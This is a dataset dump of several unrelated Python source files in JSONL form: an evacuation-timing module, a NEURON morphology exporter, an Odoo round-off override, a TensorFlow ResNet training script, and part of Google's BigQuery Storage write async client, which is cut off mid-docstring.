10 + x % 10\n x //= 10\n\n return 0 if result > pow(2, 31) else result * symbol\n\nnums = [2, 90,3,65,7, 12, 15]\ntarget = -579\ns=Solution()\nprint(s.reverse(target))\nprint(s.reverse(target))","sub_path":"src/0007.reverse-integer/my_reverse-integer.py","file_name":"my_reverse-integer.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"407937946","text":"import csv\n\nfrom PublicClass.storeObject import store_arc_obj, store_group\nfrom config import speed, library_proportion, floor\n\n\"\"\"\n 2019/3/16\n Heng Du\n 为 solution.py 提供了基本操作方法\n 计算同一出口下相邻两个疏散组 疏散等待时间 以及疏散正常需要时间\n 并计算了每个出口的所需要花费的时间,将所有出口根据时间花费的大小\n 从大到小排序,花费时间最多的出口,也就是此楼层所有人员疏散所花费的最终时间\n\n\"\"\"\n\ncurr_floor = int(floor/100)\n\n# 计算任意一个路线的上所以弧线长度和\ndef cal_distance_of_mult_arcs(path):\n arc_db = store_arc_obj()\n sum_distance = 0\n for index in range(0, (len(path) - 1)):\n # print(path[index], path[index + 1])\n for arc in arc_db:\n if path[index] == arc[0] and path[index + 1] == arc[1]:\n sum_distance += arc[2] * library_proportion\n sum_distance = float('%.1f' % sum_distance)\n return sum_distance\n\n\ndef same_path(path1, path2):\n q1 = path1[3] # path1 的队长度\n q2 = path2[3]\n t_wait = float('%.1f' % (q1 / speed))\n # print('疏散组' + path1[0] + ' 所需时间:' +\n # str(path1[4]) + 's 疏散组' + path2[0] + ' 正常所需时间:' +\n # str(path2[4]) + 's')\n # print('疏散组' + path2[0] + ' 需等待' + str(t_wait) + 's')\n tuple = (path2[0], t_wait, path2[4])\n return tuple\n\n# Type1 路径共享\n# 如:a [ A —> B -> C ] b [ B -> C ] a 与 b 路径共享\ndef share_path(path1, path2):\n # print(path1, path2)\n # print(path1[2], path2[2])\n length = len(path1[2])\n q1 = path1[3] # path1 的队长度\n q2 = path2[3] # path2 的队长度\n list1 = path1[2][1:length]\n list2 = path2[2]\n # 求路径中非共同路径部分的长度\n diff_element = [ i for i in list2 if i not in list1 ]\n # print(diff_element)\n sum_diff_distance = cal_distance_of_mult_arcs(diff_element)\n # print(\"非共同路径部分长度为:\", end='')\n # print(sum_diff_distance)\n # print('q1 长度:' + str(q1) + ' q2 长度' + str(q2))\n if q1 <= sum_diff_distance:\n t_wait = 0\n else:\n t_wait = float('%.1f' % ((q1 - sum_diff_distance) / speed))\n # print('疏散组' + path1[0] + ' 所需时间:' +\n # str(path1[4]) + 's 疏散组'+ path2[0] + ' ���常所需时间:' +\n # str(path2[4]) + 's')\n # print('疏散组' + path2[0] + ' 需等待' + str(t_wait) + 's')\n tuple = (path2[0], t_wait, path2[4])\n return tuple\n\n\n# Type2 路径完全不共享(出口结点除外,无任何交点)\n# 如:a [ A -> C ] b [ B -> C ] a 与 b 路径完全不共享\n# Type3 路径部分共享(出口结点除外,有大于或等于一个结点相交,但又不属于type1)\n# 如:a [ A -> C -> D] b [ B -> C -> D] a 与 b 路径部分共享\ndef no_share_path(path1, path2):\n # print(path1, path2)\n q1 = path1[3] # path1 的队长度\n q2 = path2[3] # path2 的队长度\n d1 = path1[1] # path1 的路线距离\n d2 = path2[1] # path2 的路线距离\n if d1 == d2:\n t_wait = float('%.1f' % (q1 / speed))\n else:\n if d2 >= (d1 + q1):\n t_wait = 0\n else:\n t_wait = float('%.1f' % ((d1+q1-d2) / speed))\n # print('疏散组' + path1[0] + ' 所需时间:' +\n # str(path1[4]) + 's 疏散组'+ path2[0] +' 正常所需时间:' +\n # str(path2[4]) + 's')\n # print('疏散组' + path2[0] + ' 需等待' + str(t_wait) + 's')\n tuple = (path2[0], t_wait, path2[4])\n return tuple\n\n\n# 判断相邻两个路径的类型\n# 输入: path1 离出口相对近的那条路径,\n# path2 离出口相对远的那条路径\n# 输出: 两条路径所属路径类型path_type\ndef type_of_two_path(path1, path2):\n # print(\"path1, path2\")\n # print(path1[2], path2[2])\n\n if set(path1[2]) < set(path2[2]):\n # print(\"------Type1 路径共享-----------\")\n tuple = share_path(path1, path2)\n # print(\"------Type1 END----------------\\n\")\n elif set(path1[2]) == set(path2[2]):\n # print(\"------Type1 同一房间-----------\")\n tuple = same_path(path1, path2)\n # print(\"------Type1 END----------------\\n\")\n else:\n # print(\"---Type2&3 路径完全不共享&路径部分共享------\")\n tuple = no_share_path(path1, path2)\n # print(\"------Type2& 3 END----------------\\n\")\n return tuple\n\n\n# 对比每相邻两个疏散组的类型,\n# 并计算出等待时间和疏散组花费的时间\n# def cal_wait_time(groud_by_exit_db):\n# time_list_all_exits = []\n# for i in groud_by_exit_db:\n# # print(i)\n# iteri = iter(i)\n# exit_id = next(iteri)\n# # print('\\033[31m', end='')\n# # print(str(exit_id) + '出口疏散情况:')\n# # print('\\033[0m', end='')\n# #\n# # print('\\033[0;36m', end='')\n# # print('[(疏散组id, 距离, 路径, 队长, 正常需要时间)]')\n# # print('\\033[0m', end='')\n#\n# time_list_every_exit = []\n# time_list_every_exit.append(exit_id)\n# paths = next(iteri)\n# if len(paths) >= 2:\n# # print(paths)\n# for index in range(0,(len(paths) -1)):\n# # print(paths[index], paths[index+1])\n# # 把最近的疏散组添加到列表里\n# if index == 0:\n# tuple = (paths[index][0], 0, paths[index][4])\n# time_list_every_exit.append(tuple)\n# else:\n# tuple = type_of_two_path(paths[index], paths[index+1])\n# time_list_every_exit.append(tuple)\n# elif len(paths) == 1:\n# # print(paths)\n# # print(\"------Type4:该出口只有一个疏散组--------\")\n# # print('疏散组'+ paths[0][0] + ' 所需时间:' +\n# # str(paths[0][4]) + 's')\n# # print('需等待 0s')\n#\n#\n# tuple = (paths[0][0], 0, paths[0][4])\n#\n#\n# time_list_every_exit.append(tuple)\n# # print(\"------Type4 END----------------\\n\")\n# else:\n# print(\"------Type5:该出口闲置--------\")\n# # print(\"------Type5 END----------------\\n\")\n#\n# time_list_all_exits.append(time_list_every_exit)\n# return time_list_all_exits\ndef cal_wait_time(groud_by_exit_db):\n time_list_all_exits = []\n for i in groud_by_exit_db:\n # print(i)\n iteri = iter(i)\n exit_id = next(iteri)\n # print('\\033[31m', end='')\n # print(str(exit_id) + '出口疏散情况:')\n # print('\\033[0m', end='')\n #\n # print('\\033[0;36m', end='')\n # print('[(疏散组id, 距离, 路径, 队长, 正常需要时间)]')\n # print('\\033[0m', end='')\n\n time_list_every_exit = []\n time_list_every_exit.append(exit_id)\n paths = next(iteri)\n if len(paths) >= 2:\n # print(paths)\n for index in range(0,(len(paths) -1)):\n # print(paths[index], paths[index+1])\n # 把最近的疏散组添加到列表里\n if index == 0:\n tuple = (paths[index][0], 0, paths[index][4])\n time_list_every_exit.append(tuple)\n tuple = type_of_two_path(paths[index], paths[index+1])\n time_list_every_exit.append(tuple)\n elif len(paths) == 1:\n # print(paths)\n # print(\"------Type4:该出口只有一个疏散组--------\")\n # print('疏散组'+ paths[0][0] + ' 所需时间:' +\n # str(paths[0][4]) + 's')\n # print('需等待 0s')\n tuple = (paths[0][0], 0, paths[0][4])\n time_list_every_exit.append(tuple)\n # print(\"------Type4 END----------------\\n\")\n else:\n print(\"------Type5:该出口闲置--------\")\n # print(\"------Type5 END----------------\\n\")\n\n time_list_all_exits.append(time_list_every_exit)\n return time_list_all_exits\n\n\n\n\n# 将cal_wait_time 得出的等待时间和疏散花费时间进行分析处理\n# 得到形如 [207, ('2', 0, 48.4), ('1', 10.9, 95.5)] 数据格式\n# [出口, (疏散组id ,疏散组等待时间 ,疏散组正常通过时间)]\ndef get_final_result(time_list_all_exits):\n print('计算每个出口实际需要的时间')\n print('[出口id, (疏散组id ,疏散组等待时间 ,疏散组正常通过时间)]')\n sum_wait_time = 0\n final_result = []\n for i in time_list_all_exits:\n print(i)\n if len(i) == 1:\n tuple = (i[0], 0)\n else:\n sum = i[len(i)-1][2]\n for j in range(1, len(i)):\n sum += i[j][1]\n sum_wait_time += i[j][1]\n tuple = (i[0], float('%.1f' % sum))\n final_result.append(tuple)\n sorted_final_result = sorted(final_result, key=lambda x:x[1], reverse=True)\n print('等待时间')\n print(float('%.1f' % sum_wait_time))\n\n # out = open('D:\\\\AProgram\\\\evacuateProg\\\\output\\\\balance.csv', 'a', newline='')\n # csv_write = csv.writer(out, dialect='excel')\n # db = []\n # db.append(float('%.1f' % sum_wait_time))\n # db.append(sorted_final_result[-1])\n # csv_write.writerow(db)\n # out.close()\n return sorted_final_result\n\n\n\n# 更新疏散组信息\ndef update_group(temp_solution_item, temp_group):\n updated_solution = ()\n group_db = store_group()\n for g in group_db:\n if g.group_id == temp_group:\n g.set_attributes(temp_solution_item[2], temp_solution_item[0])\n # g.print() # 更新group后的信息\n updated_solution = (g.group_id, g.distance, g.paths, g.num, float(g.pass_time()))\n print(updated_solution)\n return updated_solution","sub_path":"evacuateProg/PublicClass/solutionClasses.py","file_name":"solutionClasses.py","file_ext":"py","file_size_in_byte":9869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"501537281","text":"from neuron import h\nimport numpy\nimport json\nfrom urllib.request import urlopen\nimport os\nimport sys\nimport math\nimport re\n\n\nh.define_shape()\n\ndef get_pts_between(x, y, z, d, arc, lo, hi):\n left_x = numpy.interp(lo, arc, x, left=x[0], right=x[-1])\n left_y = numpy.interp(lo, arc, y, left=y[0], right=y[-1])\n left_z = numpy.interp(lo, arc, z, left=z[0], right=z[-1])\n left_d = numpy.interp(lo, arc, d, left=d[0], right=d[-1])\n right_x = numpy.interp(hi, arc, x, left=x[0], right=x[-1])\n right_y = numpy.interp(hi, arc, y, left=y[0], right=y[-1])\n right_z = numpy.interp(hi, arc, z, left=z[0], right=z[-1])\n right_d = numpy.interp(hi, arc, d, left=x[0], right=d[-1])\n in_between = [[x0, y0, z0, d0] for (x0, y0, z0, d0, a0) in zip(x, y, z, d, arc) if lo < a0 < hi]\n if len(in_between) == 0:\n # ensure there is at least one interior point\n in_between = [[(left_x + right_x) * 0.5, (left_y + right_y) * 0.5, (left_z + right_z) * 0.5, (left_d + right_d) * 0.5]]\n return [[left_x, left_y, left_z, left_d]] + in_between + [[right_x, right_y, right_z, right_d]]\n\ndef get_root(sec):\n return h.SectionRef(sec=sec).root().sec\n\nroot_sections = []\nfor sec in h.allsec():\n if not h.SectionRef(sec).has_parent():\n root_sections.append(sec)\n\n\ndef pt_from_seg(seg):\n sec = seg.sec\n n = int(h.n3d(sec=sec))\n x = [h.x3d(i, sec=sec) for i in range(n)]\n y = [h.y3d(i, sec=sec) for i in range(n)]\n z = [h.z3d(i, sec=sec) for i in range(n)]\n arc = [h.arc3d(i, sec=sec) for i in range(n)]\n f = seg.x * sec.L\n return (numpy.interp(f, arc, x), numpy.interp(f, arc, y), numpy.interp(f, arc, z))\n\n\n\ndef morph_per_root(root):\n morph = []\n h.define_shape()\n for sec in secs_with_root(root):\n n3d = int(h.n3d(sec=sec))\n x = [h.x3d(i, sec=sec) for i in range(n3d)]\n y = [h.y3d(i, sec=sec) for i in range(n3d)]\n z = [h.z3d(i, sec=sec) for i in range(n3d)]\n d = [h.diam3d(i, sec=sec) for i in range(n3d)]\n arc = [h.arc3d(i, sec=sec) for i in range(n3d)]\n length = sec.L\n half_dx = 0.5 / sec.nseg\n for seg in sec:\n morph.append(get_pts_between(x, y, z, d, arc, (seg.x - half_dx) * length, (seg.x + half_dx) * length))\n \n # add end points\n for end_pt in [0, 1]:\n for sec in secs_with_root(root):\n n3d = int(h.n3d(sec=sec))\n pt1 = [h.x3d(0, sec=sec), h.y3d(0, sec=sec), h.z3d(0, sec=sec), h.diam3d(0, sec=sec)]\n pt2 = [h.x3d(n3d - 1, sec=sec), h.y3d(n3d - 1, sec=sec), h.z3d(n3d - 1, sec=sec), h.diam3d(n3d - 1, sec=sec)]\n if h.section_orientation(sec=sec) == 0:\n morph.append([pt1] if end_pt == 0 else [pt2])\n else:\n morph.append([pt2] if end_pt == 0 else [pt1])\n return morph\n\n\ndef secs_with_root(root):\n return [sec for sec in h.allsec() if get_root(sec) == root]\n\nwith open('morphology.txt', 'w') as f:\n for root in root_sections:\n f.write(json.dumps(morph_per_root(root)))\n\n","sub_path":"json_generator/write_morphology.py","file_name":"write_morphology.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"369561272","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import fields,api,models,_\nimport math\n\nclass sale_order(models.Model):\n _inherit = 'sale.order'\n\n amount_round_off = fields.Float(compute='_amount_all',string='Round off',readonly=True)\n\n @api.depends('order_line.price_total')\n def _amount_all(self):\n for order in self:\n amount_untaxed = amount_tax = 0.0\n for line in order.order_line:\n amount_untaxed += line.price_subtotal\n # FORWARDPORT UP TO 10.0\n if order.company_id.tax_calculation_rounding_method == 'round_globally':\n taxes = line.taxes_id.compute_all(line.price_unit, line.order_id.currency_id, line.product_qty, product=line.product_id, partner=line.order_id.partner_id)\n amount_tax += sum(t.get('amount', 0.0) for t in taxes.get('taxes', []))\n else:\n amount_tax += line.price_tax\n order.update({\n 'amount_untaxed': order.currency_id.round(amount_untaxed),\n 'amount_tax': order.currency_id.round(amount_tax),\n 'amount_total': amount_untaxed + amount_tax,\n })\n if self:\n amount_total = round(math.ceil(self.amount_total))\n amount_round_off = amount_total - self.amount_total\n order.update({\n 'amount_total': amount_total,\n 'amount_round_off': amount_round_off})\n else:\n amount_total = order.amount_total\n order.update({\n 'amount_total': amount_total,\n 'amount_round_off': 0.0\n })\n return True ","sub_path":"account_roundoff/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"617791106","text":"import sys\n\nimport tensorflow as tf\n\nfrom separable_resnet import SeparableResnet\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\nimage_size = 224\nflags.DEFINE_integer('batch_size', 256, 'Size of each training batch')\nflags.DEFINE_string('dataset_dir', '', 'Size of each training batch')\n\n# Preprocessing Flags (only affect training data, not validation data)\nCHECKPOINT_FOLDER = \"checkpoints\"\nCHECKPOINT_STEP = 800\nCHECKPOINT_NAME = \"SEP-RESNET-34-imagenet\"\nVALIDATION_STEP = 150\n\n\n\nclass Train:\n def __init__(self):\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.9)\n\n self.graph = tf.Graph()\n\n with self.graph.as_default():\n self.model = SeparableResnet(training=True, batch_size=FLAGS.batch_size, dataset_dir=FLAGS.dataset_dir)\n\n self.session = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options), graph=self.graph)\n\n def train(self):\n with self.graph.as_default():\n self.session.run(tf.variables_initializer(tf.local_variables()))\n merged = tf.summary.merge_all()\n train_writer = tf.summary.FileWriter(\"summaries/train\", self.graph)\n test_writer = tf.summary.FileWriter(\"summaries/test\", self.graph)\n saver = tf.train.Saver(max_to_keep=10)\n\n latest_checkpoint = tf.train.latest_checkpoint(CHECKPOINT_FOLDER)\n self.session.run(tf.variables_initializer(tf.local_variables()))\n\n if latest_checkpoint:\n self.log(\"loading from checkpoint file: \" + latest_checkpoint)\n saver.restore(self.session, latest_checkpoint)\n else:\n self.log(\"checkpoint not found, initializing variables.\")\n self.session.run(tf.variables_initializer(tf.global_variables()))\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=self.session, coord=coord)\n s = 0\n try:\n while not coord.should_stop():\n m, _, loss, step, = self.session.run([merged,\n self.model.train_step,\n self.model.loss,\n self.model.global_step],\n feed_dict={self.model.do_validate: False})\n\n train_writer.add_summary(m, step)\n if step % VALIDATION_STEP == 0:\n m, top1, = self.session.run([merged, self.model.top_1_accuracy],\n feed_dict={self.model.do_validate: True})\n test_writer.add_summary(m, step)\n\n if step % CHECKPOINT_STEP == 0:\n saver.save(self.session, CHECKPOINT_FOLDER + '/' + CHECKPOINT_NAME, global_step=step)\n s = step\n except tf.errors.OutOfRangeError:\n self.log('Done training -- epoch limit reached')\n finally:\n self.log('getting a last checkpoint before dying')\n saver.save(self.session, CHECKPOINT_FOLDER + '/' + CHECKPOINT_NAME, global_step=s)\n coord.request_stop()\n\n coord.join(threads)\n self.session.close()\n\n @staticmethod\n def log(message):\n sys.stdout.write(message + \"\\n\")\n sys.stdout.flush()\n pass\n\n\ndef main(_):\n t = Train()\n t.train()\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"model/imagenet/train_multiple.py","file_name":"train_multiple.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"458315576","text":"\n\nfrom xai.brain.wordbase.nouns._mortician import _MORTICIAN\n\n#calss header\nclass _MORTICIANS(_MORTICIAN, ):\n\tdef __init__(self,): \n\t\t_MORTICIAN.__init__(self)\n\t\tself.name = \"MORTICIANS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"mortician\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_morticians.py","file_name":"_morticians.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"26427855","text":"# -*- coding: utf-8 -*-\n# Copyright 2023 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom collections import OrderedDict\nimport functools\nimport re\nfrom typing import (\n Dict,\n Mapping,\n MutableMapping,\n MutableSequence,\n Optional,\n AsyncIterable,\n Awaitable,\n AsyncIterator,\n Sequence,\n Tuple,\n Type,\n Union,\n)\n\nfrom google.cloud.bigquery_storage_v1beta2 import gapic_version as package_version\n\nfrom google.api_core.client_options import ClientOptions\nfrom google.api_core import exceptions as core_exceptions\nfrom google.api_core import gapic_v1\nfrom google.api_core import retry as retries\nfrom google.auth import credentials as ga_credentials # type: ignore\nfrom google.oauth2 import service_account # type: ignore\n\ntry:\n OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]\nexcept AttributeError: # pragma: NO COVER\n OptionalRetry = Union[retries.Retry, object] # type: ignore\n\nfrom google.cloud.bigquery_storage_v1beta2.types import storage\nfrom google.cloud.bigquery_storage_v1beta2.types import stream\nfrom google.cloud.bigquery_storage_v1beta2.types import table\nfrom google.protobuf import timestamp_pb2 # type: ignore\nfrom google.rpc import status_pb2 # type: ignore\nfrom .transports.base import BigQueryWriteTransport, DEFAULT_CLIENT_INFO\nfrom .transports.grpc_asyncio import BigQueryWriteGrpcAsyncIOTransport\nfrom .client import BigQueryWriteClient\n\n\nclass BigQueryWriteAsyncClient:\n \"\"\"BigQuery Write API.\n\n The Write API can be used to write data to BigQuery.\n\n The `google.cloud.bigquery.storage.v1\n API `__\n should be used instead of the v1beta2 API for BigQueryWrite\n operations.\n \"\"\"\n\n _client: BigQueryWriteClient\n\n DEFAULT_ENDPOINT = BigQueryWriteClient.DEFAULT_ENDPOINT\n DEFAULT_MTLS_ENDPOINT = BigQueryWriteClient.DEFAULT_MTLS_ENDPOINT\n\n table_path = staticmethod(BigQueryWriteClient.table_path)\n parse_table_path = staticmethod(BigQueryWriteClient.parse_table_path)\n write_stream_path = staticmethod(BigQueryWriteClient.write_stream_path)\n parse_write_stream_path = staticmethod(BigQueryWriteClient.parse_write_stream_path)\n common_billing_account_path = staticmethod(\n BigQueryWriteClient.common_billing_account_path\n )\n parse_common_billing_account_path = staticmethod(\n BigQueryWriteClient.parse_common_billing_account_path\n )\n common_folder_path = staticmethod(BigQueryWriteClient.common_folder_path)\n parse_common_folder_path = staticmethod(\n BigQueryWriteClient.parse_common_folder_path\n )\n common_organization_path = staticmethod(\n BigQueryWriteClient.common_organization_path\n )\n parse_common_organization_path = staticmethod(\n BigQueryWriteClient.parse_common_organization_path\n )\n common_project_path = staticmethod(BigQueryWriteClient.common_project_path)\n parse_common_project_path = staticmethod(\n BigQueryWriteClient.parse_common_project_path\n )\n common_location_path = staticmethod(BigQueryWriteClient.common_location_path)\n parse_common_location_path = staticmethod(\n BigQueryWriteClient.parse_common_location_path\n )\n\n @classmethod\n def from_service_account_info(cls, info: dict, *args, **kwargs):\n \"\"\"Creates an instance of this client using the provided credentials\n info.\n\n Args:\n info (dict): The service account private key info.\n args: Additional arguments to pass to the constructor.\n kwargs: Additional arguments to pass to the constructor.\n\n Returns:\n BigQueryWriteAsyncClient: The constructed client.\n \"\"\"\n return BigQueryWriteClient.from_service_account_info.__func__(BigQueryWriteAsyncClient, info, *args, **kwargs) # type: ignore\n\n @classmethod\n def from_service_account_file(cls, filename: str, *args, **kwargs):\n \"\"\"Creates an instance of this client using the provided credentials\n file.\n\n Args:\n filename (str): The path to the service account private key json\n file.\n args: Additional arguments to pass to the constructor.\n kwargs: Additional arguments to pass to the constructor.\n\n Returns:\n BigQueryWriteAsyncClient: The constructed client.\n \"\"\"\n return BigQueryWriteClient.from_service_account_file.__func__(BigQueryWriteAsyncClient, filename, *args, **kwargs) # type: ignore\n\n from_service_account_json = from_service_account_file\n\n @classmethod\n def get_mtls_endpoint_and_cert_source(\n cls, client_options: Optional[ClientOptions] = None\n ):\n \"\"\"Return the API endpoint and client cert source for mutual TLS.\n\n The client cert source is determined in the following order:\n (1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not \"true\", the\n client cert source is None.\n (2) if `client_options.client_cert_source` is provided, use the provided one; if the\n default client cert source exists, use the default one; otherwise the client cert\n source is None.\n\n The API endpoint is determined in the following order:\n (1) if `client_options.api_endpoint` if provided, use the provided one.\n (2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is \"always\", use the\n default mTLS endpoint; if the environment variable is \"never\", use the default API\n endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise\n use the default API endpoint.\n\n More details can be found at https://google.aip.dev/auth/4114.\n\n Args:\n client_options (google.api_core.client_options.ClientOptions): Custom options for the\n client. Only the `api_endpoint` and `client_cert_source` properties may be used\n in this method.\n\n Returns:\n Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the\n client cert source to use.\n\n Raises:\n google.auth.exceptions.MutualTLSChannelError: If any errors happen.\n \"\"\"\n return BigQueryWriteClient.get_mtls_endpoint_and_cert_source(client_options) # type: ignore\n\n @property\n def transport(self) -> BigQueryWriteTransport:\n \"\"\"Returns the transport used by the client instance.\n\n Returns:\n BigQueryWriteTransport: The transport used by the client instance.\n \"\"\"\n return self._client.transport\n\n get_transport_class = functools.partial(\n type(BigQueryWriteClient).get_transport_class, type(BigQueryWriteClient)\n )\n\n def __init__(\n self,\n *,\n credentials: Optional[ga_credentials.Credentials] = None,\n transport: Union[str, BigQueryWriteTransport] = \"grpc_asyncio\",\n client_options: Optional[ClientOptions] = None,\n client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,\n ) -> None:\n \"\"\"Instantiates the big query write client.\n\n Args:\n credentials (Optional[google.auth.credentials.Credentials]): The\n authorization credentials to attach to requests. These\n credentials identify the application to the service; if none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n transport (Union[str, ~.BigQueryWriteTransport]): The\n transport to use. If set to None, a transport is chosen\n automatically.\n client_options (ClientOptions): Custom options for the client. It\n won't take effect if a ``transport`` instance is provided.\n (1) The ``api_endpoint`` property can be used to override the\n default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT\n environment variable can also be used to override the endpoint:\n \"always\" (always use the default mTLS endpoint), \"never\" (always\n use the default regular endpoint) and \"auto\" (auto switch to the\n default mTLS endpoint if client certificate is present, this is\n the default value). However, the ``api_endpoint`` property takes\n precedence if provided.\n (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable\n is \"true\", then the ``client_cert_source`` property can be used\n to provide client certificate for mutual TLS transport. If\n not provided, the default SSL client certificate will be used if\n present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is \"false\" or not\n set, no client certificate will be used.\n\n Raises:\n google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport\n creation failed for any reason.\n \"\"\"\n self._client = BigQueryWriteClient(\n credentials=credentials,\n transport=transport,\n client_options=client_options,\n client_info=client_info,\n )\n\n async def create_write_stream(\n self,\n request: Optional[Union[storage.CreateWriteStreamRequest, dict]] = None,\n *,\n parent: Optional[str] = None,\n write_stream: Optional[stream.WriteStream] = None,\n retry: OptionalRetry = gapic_v1.method.DEFAULT,\n timeout: Union[float, object] = gapic_v1.method.DEFAULT,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> stream.WriteStream:\n r\"\"\"Creates a write stream to the given table. Additionally, every\n table has a special COMMITTED stream named '_default' to which\n data can be written. This stream doesn't need to be created\n using CreateWriteStream. It is a stream that can be used\n simultaneously by any number of clients. Data written to this\n stream is considered committed as soon as an acknowledgement is\n received.\n\n .. code-block:: python\n\n # This snippet has been automatically generated and should be regarded as a\n # code template only.\n # It will require modifications to work:\n # - It may require correct/in-range values for request initialization.\n # - It may require specifying regional endpoints when creating the service\n # client as shown in:\n # https://googleapis.dev/python/google-api-core/latest/client_options.html\n from google.cloud import bigquery_storage_v1beta2\n\n async def sample_create_write_stream():\n # Create a client\n client = bigquery_storage_v1beta2.BigQueryWriteAsyncClient()\n\n # Initialize request argument(s)\n request = bigquery_storage_v1beta2.CreateWriteStreamRequest(\n parent=\"parent_value\",\n )\n\n # Make the request\n response = await client.create_write_stream(request=request)\n\n # Handle the response\n print(response)\n\n Args:\n request (Optional[Union[google.cloud.bigquery_storage_v1beta2.types.CreateWriteStreamRequest, dict]]):\n The request object. Request message for ``CreateWriteStream``.\n parent (:class:`str`):\n Required. Reference to the table to which the stream\n belongs, in the format of\n ``projects/{project}/datasets/{dataset}/tables/{table}``.\n\n This corresponds to the ``parent`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n write_stream (:class:`google.cloud.bigquery_storage_v1beta2.types.WriteStream`):\n Required. Stream to be created.\n This corresponds to the ``write_stream`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n google.cloud.bigquery_storage_v1beta2.types.WriteStream:\n Information about a single stream\n that gets data inside the storage\n system.\n\n \"\"\"\n # Create or coerce a protobuf request object.\n # Quick check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([parent, write_stream])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n request = storage.CreateWriteStreamRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n if parent is not None:\n request.parent = parent\n if write_stream is not None:\n request.write_stream = write_stream\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method_async.wrap_method(\n self._client._transport.create_write_stream,\n default_retry=retries.Retry(\n initial=0.1,\n maximum=60.0,\n multiplier=1.3,\n predicate=retries.if_exception_type(\n core_exceptions.DeadlineExceeded,\n core_exceptions.ResourceExhausted,\n core_exceptions.ServiceUnavailable,\n ),\n deadline=600.0,\n ),\n default_timeout=600.0,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"parent\", request.parent),)),\n )\n\n # Send the request.\n response = await rpc(\n request,\n retry=retry,\n timeout=timeout,\n metadata=metadata,\n )\n\n # Done; return the response.\n return response\n\n def append_rows(\n self,\n requests: Optional[AsyncIterator[storage.AppendRowsRequest]] = None,\n *,\n retry: OptionalRetry = gapic_v1.method.DEFAULT,\n timeout: Union[float, object] = gapic_v1.method.DEFAULT,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> Awaitable[AsyncIterable[storage.AppendRowsResponse]]:\n r\"\"\"Appends data to the given stream.\n\n If ``offset`` is specified, the ``offset`` is checked against\n the end of stream. The server returns ``OUT_OF_RANGE`` in\n ``AppendRowsResponse`` if an attempt is made to append to an\n offset beyond the current end of the stream or\n ``ALREADY_EXISTS`` if user provids an ``offset`` that has\n already been written to. User can retry with adjusted offset\n within the same RPC stream. If ``offset`` is not specified,\n append happens at the end of the stream.\n\n The response contains the offset at which the append happened.\n Responses are received in the same order in which requests are\n sent. There will be one response for each successful request. If\n the ``offset`` is not set in response, it means append didn't\n happen due to some errors. If one request fails, all the\n subsequent requests will also fail until a success request is\n made again.\n\n If the stream is of ``PENDING`` type, data will only be\n available for read operations after the stream is committed.\n\n .. code-block:: python\n\n # This snippet has been automatically generated and should be regarded as a\n # code template only.\n # It will require modifications to work:\n # - It may require correct/in-range values for request initialization.\n # - It may require specifying regional endpoints when creating the service\n # client as shown in:\n # https://googleapis.dev/python/google-api-core/latest/client_options.html\n from google.cloud import bigquery_storage_v1beta2\n\n async def sample_append_rows():\n # Create a client\n client = bigquery_storage_v1beta2.BigQueryWriteAsyncClient()\n\n # Initialize request argument(s)\n request = bigquery_storage_v1beta2.AppendRowsRequest(\n write_stream=\"write_stream_value\",\n )\n\n # This method expects an iterator which contains\n # 